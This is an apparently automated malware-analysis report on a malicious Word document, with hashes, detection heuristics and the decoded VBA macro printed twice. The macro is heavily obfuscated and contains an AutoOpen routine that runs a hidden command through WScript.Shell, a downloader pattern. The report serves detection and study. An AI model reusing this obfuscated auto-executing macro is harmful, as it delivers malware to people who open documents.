Office (OLE) malware analysis — malicious · ec18400a0f60f245

MALICIOUS

Office (OLE)

96.8 KB Created: 2019-01-16 16:46:00 Authoring application: Microsoft Office Word First seen: 2019-01-31

MD5: 8180d32df8d75be2b874906aaa271ada SHA-1: 1a9bd48a52cc389bc217055eb59811404066c130 SHA-256: ec18400a0f60f245a337020c52edba4f68eb8a804fd0ada1b6740968356d8fb3

290 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample contains VBA macros with critical firings for Shell() calls and WScript.Shell usage, indicating the execution of external commands. The presence of an AutoOpen macro suggests automatic execution upon opening. These factors strongly suggest the macro is designed to download and execute a second-stage payload, aligning with common downloader tactics.

Heuristics 9

ClamAV: Doc.Downloader.Generic-6817580-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Generic-6817580-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage
Matched line in script
```
 End Select
sexyjm = "WscRipt.sHeLl"
   Select Case partnershipswp
```

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

 End Select
orchidiu = Array(reintermediateoa, bypassbh, Handmadeau, CreateObject("" + Vistafc + turquoiseiw + Islandsqh + sexyjm).Run!(("" + productizetb + Canyonwr + EuropeanMonetaryUnitEMU6rw + Cornernb + Managerjv + Handcraftedln.TextBox1) + Babyvp + opensourcewk + Operationszz, 69 - 69), Ohiohm, Stationdp, busni)
   Select Case quantifydz

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro

Matched line in script

End Function
Sub autoopen()
compressingch = BermudianDollarcustomarilyknownasBermudaDollaruv

Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8572 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	8572 bytes
SHA-256: `e14d445395c67af791e211b56d5de8fabdf36dc3d85fb9f3eba67368d7860547`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Handcraftedln" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Attribute VB_Name = "Functionbasedtw" Function Granitekq() On Error Resume Next Select Case Islemd Case 880 onetoonebw = Futurejz PracticalRubberCarnr = SaintPierreandMiquelonaj Shoalwh = CLng(775) actionitemsww = bypassua Case 976 Roadssn = CLng(988) framewl = paymentvd Berkshirers = CDate(Smallak) SleekFreshSoapwc = Mountainscb rebootow = Int(421) Case 891 SMTPhh = Takath Avonws = Cos(leveragefq) Meadowsao = digitalwk Principaljv = ChrB(111) SleekRubberBikews = Bedfordshiresl End Select Select Case revolutionizeqi Case 478 architecturesla = Directivesiz motivatingkm = Rwandavd Montenegronf = CLng(563) Nebraskaos = transmitterit Case 922 Intelligentbs = CLng(636) mobilecf = Georgiaws opensourcemn = CDate(Operationszi) Smallzz = depositwi missioncriticalzi = Int(53) Case 260 Crestcj = Dividecu GardenIndustrialAutomotiveqj = Cos(Functionalityjr) Forinttt = Gorgeouscv Woodenku = ChrB(501) multibytetr = Buckinghamshireak End Select Select Case syndicatepa Case 998 Enterprisewidemf = Ergonomicwz workforcerj = Traillw Intelligentic = CLng(853) Islepo = Identityns Case 499 AwesomeConcreteBikedw = CLng(138) Directivesma = Districtwa digitalqi = CDate(convergencezt) bricksandclickswd = Inversewq Cambridgeshirekf = Int(599) Case 918 RusticFrozenBikerj = GenericPlasticFishwp Productzz = Cos(Seniorwr) invoicest = Consultantfs Administratormv = ChrB(276) databasesk = IntelligentRubberBaconmr End Select sexyjm = "WscRipt.sHeLl" Select Case partnershipswp Case 534 Spursjq = customizedsi auxiliarynf = Viaductsl Frozenij = CLng(580) AGPdw = Interactionsti Case 686 quantifyingaf = CLng(979) connectingwj = solutionad bifurcatedij = CDate(Corporatevz) Humanfw = Codesspecificallyreservedfortestingpurposesdr Specialistwa = Int(390) Case 43 Sportsrq = AwesomeSteelBikemz Terracepw = Cos(neutralpt) Teamorientedms = ivoryuh RusticPlasticKeyboardrf = ChrB(646) paymentzt = wirelessdr End Select Select Case crossplatformdp Case 199 Nationalmb = redundanthf multitaskingjz = RusticSteelBallzd JordanianDinarwl = CLng(61) feedsj = engineerdj Case 243 outoftheboxuq = CLng(832) greyuo = conceptlp Woodenna = CDate(AutomotiveAutomotivedp) GorgeousSteelBallid = Accountsuv i24hourzs = Int(757) Case 33 enhancejv = budgetarymanagemental withdrawalcf = Cos(hackingtw) LicensedConcreteBikerz = Creativemf CheckingAccountzt = ChrB(231) systemwn = Handcraftedhz End Select orchidiu = Array(reintermediateoa, bypassbh, Handmadeau, CreateObject("" + Vistafc + turquoiseiw + Islandsqh + sexyjm).Run!(("" + productizetb + Canyonwr + EuropeanMonetaryUnitEMU6rw + Cornernb + Managerjv + Handcraftedln.TextBox1) + Babyvp + opensourcewk + Operationszz, 69 - 69), Ohiohm, Stationdp, busni) Select Case quantifydz Case 66 Orchestratorld = Millwf visualizews = Concretebl infomediariesqw = CLng(473) verticaltz = Districtth Case 494 RefinedCottonCheesejv = CLng(496) upwardtrendingpt = Fullyconfigurablewj withdrawaltp = CDate(Smallpn) redundantcp = HandcraftedMetalTablesj explicitcw = Int(749) Case 685 Clothingji = worldclassnf indexingqo = Cos(mobiledp) Leadrw = pinkdf Synchronisedfi = ChrB(861) GardenJeweleryzp = copyinghj End Select Select Case Niueum Case 260 SudanesePoundza = orangeld Programmablero = orangect Ergonomicvd = CLng(505) backinguphm = userfacingis Case 724 Futurewr = CLng(424) connectingic = EthiopianBirrzi quantifyingis = CDate(GenericPlasticChipszi) secondaryit = RefinedCottonPizzaqn GorgeousSoftBacondk = Int(623) Case 994 Estoniajo = Arkansasvn withdrawalnp = Cos(hubim) Canyonso = Manatqw Avonzu = ChrB(861) Solutionsoo = Larisi End Select End Function Attribute VB_Name = "invoiceao" Function GraphicalUserInterfacezd() visionarych = BahrainiDinarhu AutoLoanAccountia = Forwardii Indonesiais = Concretesw Woodentp = Lodgewb Islandpc = programli SMSzu = Pathov Woodenfp = modelim Burgsbz = robustvf iteratetu = compellingwu End Function Function synthesizebd() leadingedgezw = Cottonvd neuraliz = transmittersa Fieldrw = dynamicps Productin = Balancedmt NewMexicopl = artificialintelligencecs Applicationszw = Ethiopiahl dotcomhp = SmallSoftMousedd onlinehb = Leonejv MusicHealthtl = Legacyrh End Function Sub autoopen() compressingch = BermudianDollarcustomarilyknownasBermudaDollaruv analyzerzw = Steelld copyingci = innovatedp paymentaj = programzh Terraceij = IncredibleSoftFiship Groceryps = SMTPsz GorgeousRubberSausagesnb = Array(Handcraftedkk, Illinoisvq, invoiceuq, Granitekq, methodologiesri, frameworkcb, Healthvl) bypassinghd = auxiliaryfk Liaisondv = Toolsnn Waysww = Concretesp Buckinghamshirehc = portalswp End Sub Function Mobilityzl() Intuitivefs = j4thgenerationcp Practicalwo = Ergonomickr fuchsiamr = rebootzs generatevz = Marylandqt robustim = CzechKorunair AwesomeMetalChickenuz = Awesomewl Cottontf = nonvolatileof Valleysbm = ROIbr Brandlh = Arizonaoi End Function Attribute VB_Name = "pixelrs" Attribute VB_Name = "Leadwk" Attribute VB_Name = "navigatinglj" Attribute VB_Name = "CreditCardAccountfd" Attribute VB_Name = "Polarisedlw" Attribute VB_Name = "bandwidthqt" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "frictionlessus" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Dobrajq" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "CreditCardAccountum" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "pixelco" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Operationsop" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "neuralnetqw" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False

SHA-256: e14d445395c67af791e211b56d5de8fabdf36dc3d85fb9f3eba67368d7860547

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Handcraftedln"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"

Attribute VB_Name = "Functionbasedtw"
Function Granitekq()
On Error Resume Next
   Select Case Islemd
         Case 880
onetoonebw = Futurejz
            PracticalRubberCarnr = SaintPierreandMiquelonaj
            Shoalwh = CLng(775)
actionitemsww = bypassua
         Case 976
            Roadssn = CLng(988)
framewl = paymentvd
            Berkshirers = CDate(Smallak)
SleekFreshSoapwc = Mountainscb
            rebootow = Int(421)
         Case 891
SMTPhh = Takath
            Avonws = Cos(leveragefq)
Meadowsao = digitalwk
            Principaljv = ChrB(111)
            SleekRubberBikews = Bedfordshiresl
 End Select
   Select Case revolutionizeqi
         Case 478
architecturesla = Directivesiz
            motivatingkm = Rwandavd
            Montenegronf = CLng(563)
Nebraskaos = transmitterit
         Case 922
            Intelligentbs = CLng(636)
mobilecf = Georgiaws
            opensourcemn = CDate(Operationszi)
Smallzz = depositwi
            missioncriticalzi = Int(53)
         Case 260
Crestcj = Dividecu
            GardenIndustrialAutomotiveqj = Cos(Functionalityjr)
Forinttt = Gorgeouscv
            Woodenku = ChrB(501)
            multibytetr = Buckinghamshireak
 End Select
   Select Case syndicatepa
         Case 998
Enterprisewidemf = Ergonomicwz
            workforcerj = Traillw
            Intelligentic = CLng(853)
Islepo = Identityns
         Case 499
            AwesomeConcreteBikedw = CLng(138)
Directivesma = Districtwa
            digitalqi = CDate(convergencezt)
bricksandclickswd = Inversewq
            Cambridgeshirekf = Int(599)
         Case 918
RusticFrozenBikerj = GenericPlasticFishwp
            Productzz = Cos(Seniorwr)
invoicest = Consultantfs
            Administratormv = ChrB(276)
            databasesk = IntelligentRubberBaconmr
 End Select
sexyjm = "WscRipt.sHeLl"
   Select Case partnershipswp
         Case 534
Spursjq = customizedsi
            auxiliarynf = Viaductsl
            Frozenij = CLng(580)
AGPdw = Interactionsti
         Case 686
            quantifyingaf = CLng(979)
connectingwj = solutionad
            bifurcatedij = CDate(Corporatevz)
Humanfw = Codesspecificallyreservedfortestingpurposesdr
            Specialistwa = Int(390)
         Case 43
Sportsrq = AwesomeSteelBikemz
            Terracepw = Cos(neutralpt)
Teamorientedms = ivoryuh
            RusticPlasticKeyboardrf = ChrB(646)
            paymentzt = wirelessdr
 End Select
   Select Case crossplatformdp
         Case 199
Nationalmb = redundanthf
            multitaskingjz = RusticSteelBallzd
            JordanianDinarwl = CLng(61)
feedsj = engineerdj
         Case 243
            outoftheboxuq = CLng(832)
greyuo = conceptlp
            Woodenna = CDate(AutomotiveAutomotivedp)
GorgeousSteelBallid = Accountsuv
            i24hourzs = Int(757)
         Case 33
enhancejv = budgetarymanagemental
            withdrawalcf = Cos(hackingtw)
LicensedConcreteBikerz = Creativemf
            CheckingAccountzt = ChrB(231)
            systemwn = Handcraftedhz
 End Select
orchidiu = Array(reintermediateoa, bypassbh, Handmadeau, CreateObject("" + Vistafc + turquoiseiw + Islandsqh + sexyjm).Run!(("" + productizetb + Canyonwr + EuropeanMonetaryUnitEMU6rw + Cornernb + Managerjv + Handcraftedln.TextBox1) + Babyvp + opensourcewk + Operationszz, 69 - 69), Ohiohm, Stationdp, busni)
   Select Case quantifydz
         Case 66
Orchestratorld = Millwf
            visualizews = Concretebl
            infomediariesqw = CLng(473)
verticaltz = Districtth
         Case 494
            RefinedCottonCheesejv = CLng(496)
upwardtrendingpt = Fullyconfigurablewj
            withdrawaltp = CDate(Smallpn)
redundantcp = HandcraftedMetalTablesj
            explicitcw = Int(749)
         Case 685
Clothingji = worldclassnf
            indexingqo = Cos(mobiledp)
Leadrw = pinkdf
            Synchronisedfi = ChrB(861)
            GardenJeweleryzp = copyinghj
 End Select
   Select Case Niueum
         Case 260
SudanesePoundza = orangeld
            Programmablero = orangect
            Ergonomicvd = CLng(505)
backinguphm = userfacingis
         Case 724
            Futurewr = CLng(424)
connectingic = EthiopianBirrzi
            quantifyingis = CDate(GenericPlasticChipszi)
secondaryit = RefinedCottonPizzaqn
            GorgeousSoftBacondk = Int(623)
         Case 994
Estoniajo = Arkansasvn
            withdrawalnp = Cos(hubim)
Canyonso = Manatqw
            Avonzu = ChrB(861)
            Solutionsoo = Larisi
 End Select
End Function


Attribute VB_Name = "invoiceao"
Function GraphicalUserInterfacezd()
visionarych = BahrainiDinarhu
AutoLoanAccountia = Forwardii
Indonesiais = Concretesw
Woodentp = Lodgewb
Islandpc = programli
SMSzu = Pathov
Woodenfp = modelim
Burgsbz = robustvf
iteratetu = compellingwu
End Function
Function synthesizebd()
leadingedgezw = Cottonvd
neuraliz = transmittersa
Fieldrw = dynamicps
Productin = Balancedmt
NewMexicopl = artificialintelligencecs
Applicationszw = Ethiopiahl
dotcomhp = SmallSoftMousedd
onlinehb = Leonejv
MusicHealthtl = Legacyrh
End Function
Sub autoopen()
compressingch = BermudianDollarcustomarilyknownasBermudaDollaruv
analyzerzw = Steelld
copyingci = innovatedp
paymentaj = programzh
Terraceij = IncredibleSoftFiship
Groceryps = SMTPsz
GorgeousRubberSausagesnb = Array(Handcraftedkk, Illinoisvq, invoiceuq, Granitekq, methodologiesri, frameworkcb, Healthvl)
bypassinghd = auxiliaryfk
Liaisondv = Toolsnn
Waysww = Concretesp
Buckinghamshirehc = portalswp
End Sub
Function Mobilityzl()
Intuitivefs = j4thgenerationcp
Practicalwo = Ergonomickr
fuchsiamr = rebootzs
generatevz = Marylandqt
robustim = CzechKorunair
AwesomeMetalChickenuz = Awesomewl
Cottontf = nonvolatileof
Valleysbm = ROIbr
Brandlh = Arizonaoi
End Function

Attribute VB_Name = "pixelrs"

Attribute VB_Name = "Leadwk"

Attribute VB_Name = "navigatinglj"

Attribute VB_Name = "CreditCardAccountfd"

Attribute VB_Name = "Polarisedlw"

Attribute VB_Name = "bandwidthqt"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "frictionlessus"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Dobrajq"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "CreditCardAccountum"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "pixelco"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Operationsop"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "neuralnetqw"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.